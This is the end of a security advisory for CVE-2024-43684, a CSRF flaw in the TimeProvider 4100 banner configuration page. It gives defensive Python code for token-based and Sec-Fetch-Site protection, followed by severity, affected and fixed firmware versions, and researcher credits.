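    def verify(self, session_id: str, submitted) -> bool:
        """Constant-time comparison; missing or foreign tokens fail."""
        expected = self._tokens.get(session_id)
        if expected is None or not isinstance(submitted, str):
            return False
        return hmac.compare_digest(expected, submitted)


def fetch_metadata_ok(headers: dict) -> bool:
    """Second check: browsers send Sec-Fetch-Site on cross-site navigations
    and fetches. Same-origin and direct navigation pass, cross-site is
    rejected; clients that omit the header fall through to the token check."""
    site = headers.get("Sec-Fetch-Site")
    return site is None or site in ("same-origin", "none")


def banner_config_handler(guard, session_id, headers, form, state):
    """Constructed model of POST /bannerconfig. Returns (status, message);
    `state` is the dict holding the device settings that may be changed."""
    if not fetch_metadata_ok(headers):
        return 403, "cross-site request rejected"
    if not guard.verify(session_id, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    state["banner"] = form.get("txtcustom", "")
    return 200, "banner updated"


def render_banner_form(guard, session_id: str) -> str:
    """The legitimate page carries the token as a hidden field; a page on
    another origin cannot read it, so it cannot forge a passing request."""
    return (
        '<form method="post" action="/bannerconfig">'
        f'<input type="hidden" name="csrf_token" value="{guard.token_for(session_id)}">'
        '<textarea name="txtcustom"></textarea>'
        "</form>"
    )
```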


Conclusion:

The lack of anti-CSRF protection in the TimeProvider 4100 introduces a significant security risk, especially in environments where the web interface is exposed to internal or external users. This vulnerability can lead to unauthorized configuration changes and potential system misuse, and it undermines the integrity of user actions.

Reporting Information:

CVE Identifier: CVE-2024-43684
CVSS Score: 8.8
Affected Versions: Firmware 1.0 through 2.4.7
Tested on: Firmware release 2.3.12 
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43684
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-cross-site-request-forgery
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.